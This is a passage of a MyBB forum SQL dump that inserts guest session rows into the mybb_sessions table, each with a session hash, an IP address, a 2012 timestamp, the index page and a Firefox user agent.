'0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4fa4a9aaa40c86fef2cb3327922be697', '0', '236.103.241.31', '1352770925', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0aa246ad8db0ca2368bc8212e3370d7c', '0', '41.47.167.19', '1352770926', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e6ed06427457591172f62eb043f53e0f', '0', '41.177.246.211', '1352770927', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6398aa66a01e90ac26f79a193cc7cdd8', '0', '83.160.182.187', '1352770928', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f8c0c9770e559e57136d24febb61d921', '0', '102.8.193.104', '1352770931', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b4aa30dc5ecbc309a266e83c70603fdc', '0', '179.104.166.118', '1352770943', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('541841259bc27a82c41fbde240a67b87', '0', '8.235.12.112', '1352770932', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3ad0ec1f802d1fc32a3178b9f6159244', '0', '172.38.139.39', '1352770933', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4dc806eecb08576aa299cf876e3f43b3', '0', '86.220.236.131', '1352770934', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1cba15a2c09a853b568f16e923cb7015', '0', '186.245.51.38', '1352770935', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2c02bbd6b0e9bf1b98b406ad0120fb60', '0', '2.250.1.215', '1352770936', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b9fc632e97547e6497d6d86996f5bb19', '0', '68.83.4.242', '1352770937', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e73de4ecd2525d17b6ac2cb0ce765015', '0', '165.124.82.120', '1352770938', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('13852d2dfc021613e672ce5903773d40', '0', '9.241.130.120', '1352770940', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bc77d4967f1d689bbe47fc17817bacb2', '0', '255.70.40.103', '1352770943', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('18468a52468aaa2fd99e6cd11b35ccfb', '0', '224.172.29.37', '1352770945', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e499e4e56e0093fb26f11907d45b38d4', '0', '120.13.109.238', '1352770949', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b413806336a5ba6ef29d4a6f3cdecb44', '0', '131.27.126.30', '1352770950', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8e8a077252ff8afba6576d3c07f84f77', '0', '229.194.234.35', '1352770951', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d881d3a11d04606a2aae0e8862c23e3f', '0', '215.115.41.144', '1352770954', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('139f44ae5dfaf6c94c0c0d6ee152b811', '0', '145.164.59.168', '1352770955', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c5335282db0567aecfb41bf37e987b58', '0', '223.124.83.93', '1352770956', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('71f3a4bcff0862a5a355ba87366ef36f', '0', '238.32.38.35', '1352770957', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ec9cee8649186af5adc7ad504d4373bb', '0', '50.241.155.160', '1352770958', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cdee17dc07fc4c79be6aac2592ef0eb4', '0', '183.155.25.232', '1352770958', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('177c0facde75cb73eeedebeba007398b', '0', '202.76.113.129', '1352770959', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a55996bb35c4979dbb5c065b804e5763', '0', '21.131.116.223', '1352770960', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f653c85fae372e5e820130e87dfc67fe', '0', '20.92.190.123', '1352770961', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9da50c0cc6bf4d123abae9e3ab27f85a', '0', '166.208.254.247', '1352770965', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d1fcbf84f9441a32d958661a8f2e09db', '0', '226.145.72.28', '1352770966', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('70fa4bfcd4b720fb019ca77a379ddedf', '0', '89.235.231.48', '1352770967', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8e76f29fab5abcdb06c1de2d9727a9ac', '0', '85.21.86.160', '1352770969', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a2caf96500c6d6c41643084fa1276123', '0', '119.125.132.190', '1352770969', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1a5ed2f8d3da4d0a4c1893fecb2f2683', '0', '229.213.210.112', '1352770971', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('da139f6a3864f672b047bf0e58449dbe', '0', '127.210.69.105', '1352770973', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('45bbda0c201ed553673bd917ad274ab4', '0', '124.239.8.50', '1352770975', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('726886ce554c6d934d5991d28d622438', '0', '157.110.208.38', '1352770976', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4934a23e46a3f220170572d0397fce15', '0', '23.30.204.189', '1352770976', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8bc0f00e4a16f9e9791ce6563aa6d750', '0', '190.109.138.106', '1352770977', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b00d738e71ae7e569e5d4902d6a77a04', '0', '9.16.141.87', '1352770978', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dc50318a4e609307ff0909128676a5bb', '0', '139.205.142.115', '1352770979', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3672dab177ac694d031fea222a5b351e', '0', '97.178.91.65', '1352770980', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a5f5e87633770c60132d17a51456e5cd', '0', '242.201.128.40', '1352770981', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d8fb46d59d0cf78b035d7e40bdceff55', '0', '188.39.123.109', '1352770984', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8ebcb6f076ad3ef618fdf9ff65343c02', '0', '146.86.158.18', '1352770985', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9b3a93aea23e0dacd8705d6a88e7813d', '0', '201.181.6.122', '1352770986', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ab8249219f76b1e97a36c53c4b67c012', '0', '101.158.8.183', '1352770987', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a0db673872abfa3dff47de23546f8dce', '0', '171.170.136.162', '1352770988', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5f2cd15038ae12037c28251ce4c965b2', '0', '106.89.87.8', '1352770990', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b09ca18dd4d2bc6271919219fb758a8f', '0', '198.75.14.185', '1352770991', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b97d460ad6847d32fec47e625dc970d4', '0', '152.16.34.36', '1352770992', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4daca9931e7cab86e9008dbdb7f7f673', '0', '195.137.58.61', '1352770994', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6b57c2216b5ccb664ef3ca0569d0938e', '0', '205.112.31.21', '1352770995', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('43d9b3e1abdce136d7544b6351a056d4', '0', '158.234.192.214', '1352770996', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dc4d78e1967cb278efdb5f0441566e1e', '0', '149.29.99.211', '1352770997', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ed6c7dd455eb4221a21b8b7215833f10', '0', '189.220.24.139', '1352770998', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0e275c8f2bd4acd2b3d4f4060803fa31', '0', '153.149.13.39', '1352770999', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('96f7ad95809dd69b2376e2ef153b97ba', '0', '48.195.96.143', '1352771001', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('420739f3f92fe12959d630927906a3db', '0', '166.196.207.115', '1352771002', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a29a17e5aefe636020059721d800fd3b', '0', '8.27.210.167', '1352771003', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('512f3e30a81e3e5236d850b3086f7217', '0', '251.139.3.11', '1352771004', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f37e13427051aa4d5c7bb17b6bc77021', '0', '199.226.10.157', '1352771005', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dd49dd0cf4027f213ee1749be40f2593', '0', '90.159.223.250', '1352771006', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('132494e5cc6ff0f6c533608ae304ee97', '0', '103.172.143.15', '1352771007', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f62a907528065866a5916aef79218947', '0', '106.219.83.41', '1352771008', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f1aeda0546d05eeffceb30128bae097d', '0', '100.248.0.112', '1352771009', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c71eb78a5aa66147029cd3fbbe213395', '0', '192.110.233.8', '1352771012', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d5b0d6255f12a6f7d6c2259f0cc52ba6', '0', '196.148.179.196', '1352771013', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('700da9ba9c2ddac34a94762d03eafe4e', '0', '17.209.201.74', '1352771014', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c0a26b8b7cd00971508351c2f8cf1ee0', '0', '116.216.11.209', '1352771015', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7be735e9c77933d0ff8e430d2f34f855', '0', '36.135.145.143', '1352771016', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('24b4a3d45140445d1da3474c94467241', '0', '186.207.145.238', '1352771017', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('33fcb8a375dbe8b9788534741d4f7511', '0', '133.247.64.15', '1352771018', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7d8093df50cf58a14c4e8d14eec06be5', '0', '213.165.104.214', '1352771021', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d207b7794de776f80fd0c20307001686', '0', '8.14.94.36', '1352771021', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('adb17590b98e582aff8868c5d599ab82', '0', '6.130.93.82', '1352771022', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e6bfee7a3ea1c811b61323de68d811f7', '0', '9.19.1.100', '1352771024', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9daa1ad6978bac9f7e63bb5e46b77c1f', '0', '225.246.4.110', '1352771025', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5a51b7cc492527a31fc39f960711ea4b', '0', '95.215.166.145', '1352771026', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, 